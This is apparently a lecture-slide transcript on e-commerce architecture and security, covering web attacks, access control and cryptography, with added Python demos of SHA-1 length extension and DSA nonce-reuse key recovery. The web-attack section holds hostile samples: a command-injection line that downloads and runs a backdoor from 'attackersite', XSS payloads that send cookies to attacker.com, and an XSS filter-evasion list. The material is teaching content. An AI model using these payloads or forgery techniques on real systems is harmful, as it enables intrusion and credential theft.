EC Architectural Framework and EC Security


EC Architectural Framework and EC Security
Lecture 7
Supakorn Kungpisdan
Outline
• EC Architectural Framework
• EC Security
– Basic Security Issues
– Security Incidences
– Attacking Web Applications
– Access Controls
– Securing EC Communications
– Securing EC Networks
– Operations Security
– Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
2
EC Framework
Components of the framework (as shown in the slide's layered diagram):
• Legal and Public Policy Framework
• Public key, Identification and Authentication Infrastructure
• Business Service Infrastructure (Directories, Search Engines etc.)
• Online Payment Infrastructure (Secure Payment Protocols)
• Security and Encryption Technology
• Networked Multimedia content publishing technologies (HTML, XML, JAVA, Graphics, Video tools etc.)
• Information Distribution & Messaging Technologies (HTTP, SMTP, etc.)
• E-commerce Applications: Catalog based retail, Marketing & Advert., Banking & Investments, Supply Chain Management, Auctions, Home shopping, procurements
• Network Protocol Standards
• Network Infrastructure (Internet)
Network Infrastructure
• The Internet Superhighway is responsible for seamless, reliable transportation of information among host devices.
• Local Area Networks, IEEE 802.3 Standards and Ethernet
• Wide Area Networks
• The Seamless Interface is offered through
– Internet and TCP/IP Model
– IP Addressing and Domain Naming System
– Internet Industry Structure
Information Distribution Technologies
• Standard Protocols for Information
Distribution on Internet
– File Transfer Protocol (FTP)
– Simple Mail Transfer Protocol (SMTP)
– Hyper Text Transfer Protocol (HTTP)
– Web Server Implementations
• Apache Web Server
• Microsoft’s IIS
Multimedia Publishing Technologies
• Information Publishing and Web Browsers
– Hyper Text Markup Language (HTML)
– Forms and Common Gateway Interface
– Active Server Pages (ASP)
– Dynamic HTML
– HTML Editors
– XML
• Multimedia Content
– Graphics and Image Formats
– Web Image Formats
– Other Multimedia objects
• VRML (Virtual Reality Markup Language)
Security and Encryption
• Importance of security for Electronic Commerce and
Inherent vulnerability of Internet
• Protecting the Web (HTTP) Service
• The Issues in Transaction Security
– Cryptography and Cryptanalysis
– Symmetric key cryptographic Algorithms
– Public-key Algorithms
– Authentication protocols
– Integrity and Non-repudiation
• Digital Certificates and Signatures
• Electronic Mail Security
– PGP, S/MIME
• Security protocols for E-commerce
– SSL, TLS
Payment Services
• Payment Systems
• Characteristics of Online Payment Systems
– Pre-Paid Electronic Payment Systems
– Instant-paid Electronic Payment Systems
– Post-Paid Electronic Payment Systems
• Some Electronic Payment Systems
– Secure Electronic Transaction (SET) for Credit Cards
– E-cash
– NetCheque
Business Service Infrastructure
• Searching and Locating Information on Web Space
• Information Directories
• Search Engines
• Improving the search results
• Internet Advertising
Public Policy and Legal Infrastructure
• Universal Access to Network Infrastructure
• Model Law for Electronic Commerce
• Taxation Issues in Electronic Commerce
• Need for Public Key Infrastructure (PKI)
• Digital Certificates and Digital Signatures
Basic Security Issues
• From the user’s perspective:
– Is the Web server owned and operated by a legitimate company?
– Does the Web page or form contain any malicious or dangerous code or content?
– Will the owner of the Web site refrain from distributing the information the user provides to some other party?
Basic Security Issues (cont.)
• From the company's perspective:
– How does the company know the user will not attempt to break into the Web server or alter the pages and content at the site?
– How does the company know that the user will not try to disrupt the server so that it is not available to others?
Basic Security Issues (cont.)
• From both parties' perspectives:
– How do both parties know that the network connection is free from eavesdropping by a third party "listening" on the line?
– How do they know that the information sent back and forth between the server and the user's browser has not been altered?
Goals of Computer Security (CIA)
• Confidentiality
– Ensure that the message is accessible only by authorized
parties
• Integrity
– Ensure that the message is not altered during the
transmission
• Availability
– Ensure that the information on the system is available for
authorized parties at appropriate times
Basic Security Issues
• Authentication
• Authorization
• Auditing
• Confidentiality (Privacy)
• Integrity
• Availability
• Non-repudiation
Security Trends
Vulnerabilities, Threats, and Attacks
• Vulnerability
– A weakness in the security system
– E.g. a program flaw, poor security configuration, bad
password policy
• Threat
– A set of circumstances or people that potentially causes
loss or harm to a system
• Attack
– An action or series of actions to harm a system
Relationships among different Security Components
Relationship of Threats and Vulnerabilities
How Hackers Exploit Weaknesses
General Security Issues at EC Sites
Types of Security Incidences
Hackers
• White Hat Hackers
• Grey Hat Hackers
• Script Kiddies
• Hacktivists
• Crackers or Black Hat Hackers
Hackers’ Steps
1. Gather information
– Telephone conversation, password crackers
2. Gain initial system access
– Often limited access and rights
3. Increase privileges and expand access
– Try to get root privilege
4. Carry out purpose of the attack
– Steal or destroy information
5. Install backdoors
– Build entrance for the next visit
6. Cover tracks and exit
– Remove all traces, usually by modifying log files
Malicious Codes
• Viruses
– A destructive program code that attaches itself to a host, copies itself and spreads to other hosts
– A virus replicates and remains undetected until it is activated.
• Worms
– Unlike viruses, a worm is independent of other programs or files. No trigger is needed.
• Trojans
– An apparently harmless program that contains malicious code
• Spyware
– Software installed on a target machine that sends information back to an owning server
Security Incidences
• Probe
– A probe is characterized by unusual attempts to gain access to a system or to discover information about the system.
– Sometimes followed by a more serious security event, but probes are often the result of curiosity or confusion.
• Scan
– A large number of probes done using an automated tool.
– Often a prelude to a more directed attack on systems whose security can be breached.
• Account Compromise
– Unauthorized use of a computer account by someone other than the account owner, without involving system-level or root-level privileges. It might expose the victim to serious data loss, data theft, or theft of services.
– The lack of root-level access means that the damage can usually be contained, but a user-level account opens up avenues for greater access to the system.
Security Incidences (cont’d)
• Root Compromise
– Similar to an account compromise, except that the
account that has been compromised has special
privileges on the system.
• Packet Sniffer
– A program that captures data from information packets
as they travel over the network.
Security Incidences (cont’d)
denial-of-service (DoS) attack
An attack on a Web site in which an attacker uses
specialized software to send a flood of data
packets to the target computer with the aim of
overloading its resources
distributed denial-of-service (DDoS) attack
A denial-of-service attack in which the attacker
gains illegal administrative access to as many
computers on the Internet as possible and uses
the multiple computers to send a flood of data
packets to the target computer
Using Zombies in a Distributed DoS Attack
Attacking Web Applications
• The majority of vulnerabilities are caused by a lack of
proper input validation by the application before
processing user-supplied data
• This can allow attackers to disclose information about
the site, steal information from backend DBs, or execute
binary code on the web server
SQL Injection
• Many web applications rely on backend DBs for
information storage and retrieval.
• Sometimes a script will perform a DB query using input
supplied from a web page, without verifying that the
input does not contain any escape characters
• Consider the following:
• $query = "SELECT * FROM users WHERE username = '{$_POST['user']}' AND password = '{$_POST['pass']}'";
• With a crafted password value the query the database receives becomes:
"SELECT * FROM users WHERE username = 'bob' AND password = ' ' OR 1=1 ";
Code Injection
• Sometimes user-supplied strings are not properly
checked for escape characters before being passed to
commands as arguments
• Consider a PHP script that takes a string supplied from
web page form and passes it to the nslookup utility
Code Injection (cont.)
• If the user supplies ;ls -la /, the script will execute the command nslookup ;ls -la /, resulting in a listing of the root directory being printed out
Code Injection (cont.)
• wget and perl commands could be used to download
and run a backdoor on the web server by supplying the
following line to the script
• ;wget http://attackersite/backdoor.pl;perl backdoor.pl
Cross-Site Scripting (XSS)
• XSS vulnerabilities allow attackers to inject code or HTML into a web page that will be executed when a different user visits that page
• These attacks target visitors to a web site, not the site itself, and occur when a web page does not properly sanitize user input before using it in output
• In a vulnerable website it is possible to execute HTML and JavaScript code from an unsanitized form; combined, the two can be really dangerous: it is possible to steal cookies or to redirect web pages to a fake login in order to steal usernames and passwords.
Types of XSS
• The term XSS is actually a bit elusive because it covers different kinds of attacks that rely on different attacking mechanisms.
• There are actually three types of Cross-Site Scripting, commonly named:
– DOM-Based XSS
– Non-persistent XSS
– Persistent XSS
Ref: http://www.milw0rm.com/papers/146
http://en.wikipedia.org/wiki/Cross_Site_Scripting
DOM-based XSS
• The DOM-based or Type 0 XSS vulnerability, also referred to as local XSS, is based on the standard object model for representing HTML or XML, called the Document Object Model or DOM for short.
• DOM-based XSS allows an attacker to work not on a victim website but on the victim's local machine
DOM-based XSS (cont.)
1. The attacker creates a well-built malicious website
2. The unsuspecting user opens that site
3. The user has a vulnerable page on his machine
4. The attacker's website sends commands to the vulnerable HTML page
5. The vulnerable local page executes those commands with the user's privileges on that machine
6. The attacker easily gains control of the victim computer.
Exploit Scenario
1. Mallory sends the URL of a maliciously constructed web
page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a
vulnerable HTML page installed locally on Alice's
computer.
4. The vulnerable HTML page contains JavaScript which
executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with
the privileges Alice holds on her own computer.
DOM-based XSS (cont.)
• DOM-based XSS is really dangerous because it operates strictly on the victim system, and as long as the user doesn't look after his/her security and doesn't apply updates, the DOM-based XSS will keep working.
• Solution: To prevent this kind of attack there are only two things to take care of:
– Do not visit untrusted websites
– Keep your system up to date
Non-persistent XSS
• The non-persistent or Type 1 XSS is also referred to as
a reflected vulnerability, and is by far the most common
type.
• It's commonly named as "non-persistent" because it
works on an immediate HTTP response from the victim
website
• It shows up when data provided by a web client is used
immediately by server-side scripts to generate a page of
results for that user.
• If unvalidated user-supplied data is included in the
resulting page without HTML encoding, this will allow
client-side code to be injected into the dynamic page
Non-persistent XSS: Search Engine
• The attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will render these HTML elements.
• If this happens, in 99% of cases the search engine will also execute arbitrary JavaScript code.
Example
1. Assume that a website works like this:
http://www.example.com/search.php?text=TEXTTOSEARCH
2. Try to include some HTML tags in the "text" variable:
http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg">
If the website is vulnerable it will display the attacker's image in the result webpage.
Example (cont.)
3. Then try to write some JavaScript code:
http://www.example.com/search.php?text=<script>alert(document.cookie)</script>
Probably the website will return an alert popup with the current cookie for the site itself.
Example (cont.)
• This vulnerability can be used by the attacker to steal information from users of the victim website, for example by sending them an email with a URL like:
http://www.victim.com/search.php?text=MALICIOUSCODE
• To make that URL less suspicious it is useful to encode the code as URL hex values.
For example the code: <script>alert("XSS")</script>
Encoded will look like:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Example (cont.)
• So the malicious URL turns from:
http://www.victim.com/search.php?text=<script>alert("XSS")</script>
into:
http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
which, for a clueless user, is a lot less suspicious than the first one.
Example (cont.)
1. The attacker realizes that the victim website is vulnerable to XSS
2. The attacker creates on his website an ad-hoc page which is used to steal sensitive information, e.g. cookies, or to present a fake login for the victim website.
3. The attacker provides a user with a crafted URL containing malicious code like:
http://www.victim.com/search.php?text=<script>document.location("http://attackersite.com/fakelogin.php")</script>
encoded in hex.
4. The user visits the web page and is silently redirected to the attacker's fake login
5. The user is invited to log into the system and he does.
6. The fake login steals the username and password of the victim.
Exploit Scenario
1. Alice often visits a particular website, which is hosted by
Bob. Bob's website allows Alice to log in with a
username/password pair and store sensitive
information, such as billing information.
2. Mallory observes that Bob's website contains a
reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and
sends Alice an email, making it look as if it came from
Bob (i.e., the email is spoofed).
4. Alice visits the URL provided by Mallory while logged
into Bob's website.
Exploit Scenario (cont.)
5. The malicious script embedded in the URL executes in
Alice's browser, as if it came directly from Bob's server.
The script can be used to email Alice's session cookie
to Mallory. Mallory can then use the session cookie to
steal sensitive information available to Alice
(authentication credentials, billing info, etc) without
Alice's knowledge.
Interesting Example
• http://www.yannarak.net/node/2
Persistent XSS
• Persistent XSS is similar to non-persistent XSS
– Both work on a victim site and try to steal user information
• However, the attacker doesn't need to provide the crafted URL to the users
• Because the website itself permits users to insert persistent data into the system
– This is the case, for example, of "guestbooks"
• Usually users use that kind of tool to leave messages to the owner of the website
• An attacker can insert some malicious code in his message and make ALL visitors victims of it.
Exploit Scenario
1. Bob hosts a web site allowing users to post messages
and other content to the site for later viewing by other
members.
2. Mallory notices that Bob's website is vulnerable to a
type 2 XSS attack.
3. Mallory posts a message, controversial in nature, which
may encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users'
session cookies or other credentials could be taken and
sent to Mallory's web server without their knowledge.
5. Later, Mallory logs in as other site users and posts
messages on their behalf....
Exploit Scenario (cont.)
• This works when the tool provided (the guestbook in the example) doesn't perform any check on the content of the inserted message: it just inserts the data provided by the user into the result page.
• The attacker could easily insert as much code as he wants into the tool, for example:
<img src="javascript:document.location('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));">
This allows the attacker to steal the cookie of the victim user.
More about XSS
• In order to make the attack less suspicious it's possible
to "obfuscate" the IP address of the attacker's website,
encoding the IP address with three formats:
– Dword Address
– Hex Address
– Octal Address
• For example the IP address 127.0.0.1 will look like:
– Dword: 2130706433
– Hex: 0x7f.0x00.0x00.0x01
– Octal: 0177.0000.0000.0001
• Try for example: http://0x7f.0x00.0x00.0x01/
and it will open your localhost web server.
Possible XSS Cheats
• <IMG SRC="javascript:alert('XSS');">
• <IMG SRC=javascript:alert('XSS')>
• <IMG SRC=&#x22;&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x50;&#x4C;&#x41;&#x59;&#x48;&#x41;&#x43;&#x4B;&#x2E;&#x4E;&#x45;&#x54;&#x27;&#x29;&#x22;>
• <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
• <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
• <<SCRIPT>alert("XSS");//<</SCRIPT>
• <iframe src=http://example.com/scriptlet.html <
• <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
• <BODY BACKGROUND="javascript:alert('XSS')">
• <BODY ONLOAD=alert(document.cookie)>
• <IMG DYNSRC="javascript:alert('XSS')">
Possible XSS Cheats (cont.)
• <IMG DYNSRC="javascript:alert('XSS')">
• <BR SIZE="&{alert('XSS')}">
• <IMG SRC='vbscript:msgbox("XSS")'>
• <TABLE BACKGROUND="javascript:alert('XSS')">
• <DIV STYLE="width: expression(alert('XSS'));">
• <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
• <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
• <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
• <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
• <A HREF="javascript:document.location='http://www.example.com/'">XSS</A>
Information Disclosure
• An error page can disclose the path of the web server's root directory
• The path disclosure can aid attackers performing reconnaissance on the site
• phpinfo.php, part of a default PHP install, is a script that reports the OS and software versions on the host and other related information
• Google for inurl:phpinfo.php to see exactly how much information is leaked
CIA for Access Control
• Confidentiality
– Not disclosed to unauthorized person
• Integrity
– Prevention of modification by unauthorized users
– Prevention of unauthorized changes by otherwise authorized
users
– Internal and External Consistency
– Internal Consistency within the system (i.e. within a database the
sum of subtotals is equal to the sum of all units)
– External Consistency – database with the real world (i.e.
database total is equal to the actual inventory in the warehouse)
• Availability
– Timely access
Security Controls
Ref: S. Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
Security Controls (cont.)
Ref: S. Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
Authentication
• Something you know
– Passwords, pins
• Something you have
– Tokens, smart cards
• Something you are
– biometrics
Biometrics
biometric systems
Authentication systems that identify a person by
measurement of a biological characteristic, such as
fingerprints, iris (eye) patterns, facial features, or voice
physiological biometrics
Measurements derived directly from different parts of
the body (e.g., fingerprint, iris, hand, facial
characteristics)
behavioral biometrics
Measurements derived from various actions and
indirectly from various body parts (e.g., voice scans or
keystroke monitoring)
Biometrics (cont.)
• Fingerprints
• Palm Scans
• Hand Geometry
• Retina Scans
• Iris Scans
• Facial Scans
• Voice Print
• Signature Dynamics
• Keyboard Dynamics
Single Sign-on
• Kerberos
• Allow a user to access many services from only
one authentication
• Symmetric key encryption
– KDC – Kerberos-trusted Key Distribution Center
– AS – Authentication Server
– TGS – Ticket Granting Service
Kerberos (cont.)
Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson Prentice Hall
Intrusion Detection
• Network Based
– Real Time, Passive
– Snort
• Host Based
– System and event logs
– Limited by log capabilities
• Honey Pot
• System Integrity Verifier (SIV)
– Tripwire
Intrusion Detection (cont.)
• Signature Based – (Knowledge Based)
– Signatures of an attack are stored and referenced
– Failure to recognize slow attacks
– Must have signature stored to identify
• Statistical Anomaly Based (Behavior Based)
– IDS determines “normal” usage profile using statistical samples
– Detects anomaly from the normal profile
Measures for compensating for both internal
and external access violations
• Backups
• RAID – Redundant Array of Inexpensive Disks
• Fault Tolerance
• Business Continuity Planning
• Insurance
Transaction Security Issues
• Disclosure:
– Release of message contents to any person not authorized to
see them
• Traffic Analysis:
– It refers to the discovery of the pattern of traffic between parties.
• Masquerade:
– It refers to insertion of messages into the network from a
fraudulent source.
• Content modification:
– Changes to the contents of a message, including insertion,
deletion, transposition, or modification.
Transaction Security Issues (cont.)
• Sequence modification:
– It refers to the insertion, deletion, and reordering of some sequenced packets by the intruder during transmission.
• Timing modification:
– It refers to the delay or replay of old message sequences that were recorded by the intruder in an earlier transaction.
• Repudiation:
– It refers to the denial of receipt of a message by the destination or denial of transmission of a message by the source.
Encryption
The process of scrambling (encrypting) a message
(plaintext) into ciphertext in such a way that it is
difficult, expensive, or time-consuming for an
unauthorized person to unscramble (decrypt) it
plaintext + encryption algorithm + key → ciphertext
Basic Terminology
• plaintext - original message
• ciphertext - coded message
• cipher - algorithm for transforming plaintext to ciphertext
• key - info used in cipher known only to sender/receiver
• encipher (encrypt) - converting plaintext to ciphertext
• decipher (decrypt) - recovering plaintext from ciphertext
• cryptography - study of encryption principles/methods
• cryptanalysis (codebreaking) - study of principles/methods of deciphering ciphertext without knowing the key
• cryptology - field of both cryptography and cryptanalysis
Cryptography and Steganography
• Plaintext can be hidden by two ways:
– Steganography: conceal the existence of the
message
– Cryptography: render the message unintelligible to
outsiders using various kinds of transformation of
the text
• Examples of Steganography
– Character marking: overwrite text with pencil
– Invisible ink: use special substance
– Pin punctures: pin puncture on selected letters
How a Cryptosystem Works
Plaintext (M) (data file or messages)
→ encryption algorithm (E) + secret key A (KA): E(M) = C
Ciphertext (C) (stored or transmitted safely)
→ decryption algorithm (D) + secret key B (KB): D(C) = M
Plaintext (M) (original data or messages)
Hence D(E(M)) = M
Note: Key A may be the same as Key B, depending on the algorithm
Brute Force Search
• always possible to simply try every key
• most basic attack, proportional to key size
• assume either know / recognise plaintext
Key Size (bits) | Number of Alternative Keys | Time required at 1 decryption/µs | Time required at 10^6 decryptions/µs
32 | 2^32 = 4.3 × 10^9 | 2^31 µs = 35.8 minutes | 2.15 milliseconds
56 | 2^56 = 7.2 × 10^16 | 2^55 µs = 1142 years | 10.01 hours
128 | 2^128 = 3.4 × 10^38 | 2^127 µs = 5.4 × 10^24 years | 5.4 × 10^18 years
168 | 2^168 = 3.7 × 10^50 | 2^167 µs = 5.9 × 10^36 years | 5.9 × 10^30 years
26 characters (permutation) | 26! = 4 × 10^26 | 2 × 10^26 µs = 6.4 × 10^12 years | 6.4 × 10^6 years
Caesar Cipher
• earliest known substitution cipher
• by Julius Caesar
• first attested use in military affairs
• replaces each letter by 3rd letter on
• example:
meet me after the toga party
PHHW PH DIWHU WKH WRJD SDUWB
Caesar Cipher
K=3
Outer: plaintext
Inner: ciphertext
Cryptanalysis of Caesar Cipher
• only have 26 possible ciphers
– A maps to A,B,..Z
• could simply try each in turn
• a brute force search
• given ciphertext, just try all shifts of letters
• do need to recognize when have plaintext
• eg. break ciphertext "GCUA VQ DTGCM"
Types of Cryptography
• Symmetric Cryptography
– Deploy the same secret key to encrypt and decrypt
messages
– The secret key is shared between two parties
– Encryption algorithm is the same as decryption
algorithm
• Asymmetric (Public-key) Cryptography
– Private key, Public key
– The secret key is not shared and two parties can
still communicate using their public keys
– Encryption alg. is different from decryption alg.
Symmetric Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson Prentice Hall
Public-Key Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson Prentice Hall
Data Encryption Standard (DES)
• Derived in 1972 from the Lucifer algorithm developed by Horst Feistel at IBM
• Commercial and non-classified systems
• DES uses a 64-bit block size and a 56-bit key; it begins with a 64-bit key and strips 8 parity bits
• DEA is a 16-round cryptosystem designed for implementation in hardware
• 56-bit key = 2^56, or about 70 quadrillion, possible keys
• Distributed systems can break it; the U.S. Government no longer uses it
• Triple DES (three encryptions using DEA) is now being used until AES is adopted
3DES
• Double encryption is subject to the meet-in-the-middle attack
• Encrypt on one end, decrypt on the other, and compare the values
• So Triple DES is used
• Can be done several different ways:
– DES-EDE2 (encrypt with key 1, decrypt with key 2, encrypt with key 1)
– DES-EE2 (encrypt with key 1, encrypt with key 2, encrypt with key 1)
– DES-EE3 (encrypt with key 1, encrypt with key 2, encrypt with key 3) - most secure
AES
• Advanced Encryption Standard
• Block Cipher that will replace DES
• Anticipated that Triple DES will remain approved for
Government Use
• AES announced by NIST in January 1997 to find
replacement for DES
• October 2, 2000 NIST Selected Rijndael
• Designed by 2 Belgian cryptographers, Dr. Daemen and Dr. Rijmen
• Will be used by government for sensitive but unclassified documents
RSA
• Rivest, Shamir and Adleman
• Based on the difficulty of factoring a number which is the product of two large prime numbers, maybe 200 digits each.
• Can be used for encryption, key exchange, and digital signatures
Elliptic Curve Cryptography (ECC)
• Elliptic curve discrete logarithms are harder to compute than general discrete logarithms
• Smaller key size for the same level of security
• Elliptic curve key of 160 bits = RSA of 1024 bits
• Suited to smart cards and wireless devices (less memory and processing)
• Digital signatures, encryption and key management
Digital Signature Standard (DSS) and Secure Hash Standard (SHS)
• Enables use of the RSA digital signature algorithm or DSA – Digital Signature Algorithm (based on El Gamal)
• Both use the Secure Hash Algorithm to compute a message digest, which is then processed by DSA to verify the signature. The message digest is used instead of the longer message because it is faster.
MD5 and SHA-1
• MD5 Message Digest version 5
– Developed by Ronald Rivest in 1991
– Produces a 128-bit message digest
– Collisions have been practical since 2004; MD5 must not be used where collision resistance matters (certificates, signatures)
• SHA-1
– Secure Hash Algorithm; produces a 160-bit digest for any message shorter than 2^64 bits
– Design goals: computationally infeasible to find a message from its digest (preimage resistance), and to find two different messages with the same digest (collision resistance)
– The collision goal no longer holds: a practical SHA-1 collision was published in 2017 (SHAttered) and browsers and CAs have retired it; use SHA-256 or SHA-3
– Padding bits are added to the message (a 1 bit, zeros, then the 64-bit message length) to make it a multiple of 512 bits, which is then processed one 512-bit block at a time
– Because the digest is just the final internal state, a plain hash of secret || message can be extended by an attacker who never learns the secret; use HMAC for message authentication
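The padding and block structure just described, as an added example that is not from the lecture: a small pure-Python SHA-1 (checked against hashlib) whose internal state can be resumed, used to show the length-extension attack on a constructed naive MAC of the form SHA-1(secret || message). The server secret, the request and the appended extension are all constructed; the HMAC function at the end is the standard fix.

```python
"""SHA-1 padding made explicit, and the length-extension attack it enables.

Added example, not from the lecture. The SHA-1 core below is written out so
the padding and the 512-bit block structure are visible; the 'naive MAC'
H(secret || message) and the secret/message values are constructed to show
why a raw Merkle-Damgard hash must not be used as a MAC (use HMAC).
"""
import hashlib
import hmac
import struct

_MASK32 = 0xFFFFFFFF
_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def _rotl32(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK32


def sha1_padding(msg_len):
    """Padding for a message of msg_len bytes: 0x80, zeros up to 56 mod 64,
    then the 64-bit big-endian bit length (total is a multiple of 512 bits)."""
    zeros = (55 - msg_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", msg_len * 8)


def sha1(data, state=_IV, prior_len=0):
    """SHA-1 of data. 'state' and 'prior_len' let the computation resume from
    a known digest as if prior_len bytes (a multiple of 64) were already hashed."""
    h = list(state)
    data += sha1_padding(prior_len + len(data))
    for off in range(0, len(data), 64):
        w = list(struct.unpack(">16I", data[off:off + 64]))
        for i in range(16, 80):
            w.append(_rotl32(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
        a, b, c, d, e = h
        for i in range(80):
            if i < 20:
                f, k = (b & c) | (~b & d), 0x5A827999
            elif i < 40:
                f, k = b ^ c ^ d, 0x6ED9EBA1
            elif i < 60:
                f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
            else:
                f, k = b ^ c ^ d, 0xCA62C1D6
            tmp = (_rotl32(a, 5) + f + e + k + w[i]) & _MASK32
            a, b, c, d, e = tmp, a, _rotl32(b, 30), c, d
        h = [(x + y) & _MASK32 for x, y in zip(h, (a, b, c, d, e))]
    return struct.pack(">5I", *h)


def naive_mac(secret, msg):
    """The broken construction: tag = SHA-1(secret || msg)."""
    return hashlib.sha1(secret + msg).digest()


def length_extension(tag, msg, secret_len, extension):
    """Given tag = SHA-1(secret||msg) and only len(secret), forge a valid tag
    for msg || glue || extension without ever learning the secret."""
    glue = sha1_padding(secret_len + len(msg))
    consumed = secret_len + len(msg) + len(glue)  # a multiple of 64 bytes
    forged_tag = sha1(extension, struct.unpack(">5I", tag), consumed)
    return msg + glue + extension, forged_tag


def hmac_tag(secret, msg):
    """The fix: HMAC keys both an inner and an outer hash, so extension fails."""
    return hmac.new(secret, msg, hashlib.sha256).digest()


# Constructed scenario: a server authenticates requests with naive_mac.
SERVER_SECRET = b"constructed-server-secret"
ORIGINAL = b"user=alice&role=customer"
EXTENSION = b"&role=admin"

if __name__ == "__main__":
    tag = naive_mac(SERVER_SECRET, ORIGINAL)
    forged_msg, forged_tag = length_extension(tag, ORIGINAL, len(SERVER_SECRET), EXTENSION)
    print("server accepts forgery:", naive_mac(SERVER_SECRET, forged_msg) == forged_tag)
```

The glue bytes are the padding the server itself would have appended, so the forged message carries a visible 0x80 and a length field in the middle; many parsers ignore such bytes, which is why the attack has worked against real signed-URL schemes. The same attack applies to MD5 and SHA-256; SHA-3 and HMAC are not affected.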
Digital Signatures
(diagram only in the original slide; not reproduced in the transcript)
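The sign-the-digest flow of the DSS/SHS slide and the Digital Signatures slide above, as an added example that is not from the lecture: DSA key generation, signing and verification over a constructed toy group with SHA-256 as the digest function, followed by recovery of the private key from two signatures that reused the nonce k. The group parameters, the messages and the careless reused-k signer are all constructed; only the arithmetic follows the standard.

```python
"""DSA sign/verify over a toy group, plus the classic nonce-reuse failure.

Added example, not from the lecture. The group is a constructed toy: q is the
Mersenne prime 2^31-1 and p is the first prime of the form k*q+1 found at
import time; FIPS 186 uses p of 2048/3072 bits and q of 224/256 bits.
Messages are hashed with SHA-256 (the DSS/SHS pairing) and it is the digest,
not the message, that gets signed.
"""
import hashlib
import secrets

_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def _is_prime(n):
    """Miller-Rabin with fixed bases; deterministic for n < 3.3e24."""
    if n < 2:
        return False
    for b in _BASES:
        if n % b == 0:
            return n == b
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for a in _BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def _toy_group():
    q, k = 2 ** 31 - 1, 2
    while not _is_prime(k * q + 1):
        k += 2
    p = k * q + 1
    g = pow(2, k, p)  # 2^((p-1)/q) has order q unless it equals 1
    return p, q, (g if g != 1 else pow(3, k, p))


P, Q, G = _toy_group()


def _hash_to_int(msg):
    """SHA-256 digest reduced into Z_q (real DSA truncates to |q| bits)."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % Q


def dsa_keygen():
    x = secrets.randbelow(Q - 1) + 1  # private key
    return x, pow(G, x, P)            # (x, y)


def dsa_sign(x, msg, k=None):
    """Sign msg. Leave k=None so a fresh random nonce is drawn each time; it
    is a parameter only so the reuse attack below can be demonstrated."""
    while True:
        kk = k if k is not None else secrets.randbelow(Q - 1) + 1
        r = pow(G, kk, P) % Q
        s = pow(kk, -1, Q) * (_hash_to_int(msg) + x * r) % Q
        if r and s:
            return r, s
        if k is not None:
            raise ValueError("degenerate signature for this k")


def dsa_verify(y, msg, sig):
    r, s = sig
    if not (0 < r < Q and 0 < s < Q):
        return False
    w = pow(s, -1, Q)
    u1, u2 = _hash_to_int(msg) * w % Q, r * w % Q
    return (pow(G, u1, P) * pow(y, u2, P) % P) % Q == r


def recover_key_from_reused_nonce(msg1, sig1, msg2, sig2):
    """Same k gives the same r; two linear equations in Z_q yield k, then x."""
    (r, s1), (r2, s2) = sig1, sig2
    if r != r2:
        raise ValueError("different r: the nonce was not reused")
    h1, h2 = _hash_to_int(msg1), _hash_to_int(msg2)
    k = (h1 - h2) * pow((s1 - s2) % Q, -1, Q) % Q
    return (s1 * k - h1) * pow(r, -1, Q) % Q


def nonce_reuse_demo(x):
    """A careless signer reuses one k for two messages; return (k, recovered x)."""
    m1 = b"pay 10 to alice"
    m2 = next(m for m in (b"pay 1000 to mallory #%d" % i for i in range(100))
              if _hash_to_int(m) != _hash_to_int(m1))
    for k in range(1, Q):
        try:
            sig1, sig2 = dsa_sign(x, m1, k), dsa_sign(x, m2, k)
        except ValueError:
            continue
        if (sig1[1] - sig2[1]) % Q:
            return k, recover_key_from_reused_nonce(m1, sig1, m2, sig2)
    raise RuntimeError("no usable k found")


if __name__ == "__main__":
    x, y = dsa_keygen()
    print("valid:", dsa_verify(y, b"hello", dsa_sign(x, b"hello")))
    print("nonce reuse recovers x:", nonce_reuse_demo(x)[1] == x)
```

Verification never needs the message itself, only its digest, which is the point of the DSS/SHS pairing. The recovery function is the reason k must be fresh and unpredictable per signature (RFC 6979 derives it deterministically from the key and the digest so that it cannot repeat).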
Public Key Certification Systems
• Anyone could publish a public key under the name of another individual, so a key by itself proves nothing about who holds the private half
• Digital certificates counter this attack: a certificate binds an identity (person, server, organisation) to a public key
• A Certificate Authority (CA) acts as a notary, checking the identity and signing the binding; relying parties must in turn trust the CA's root key
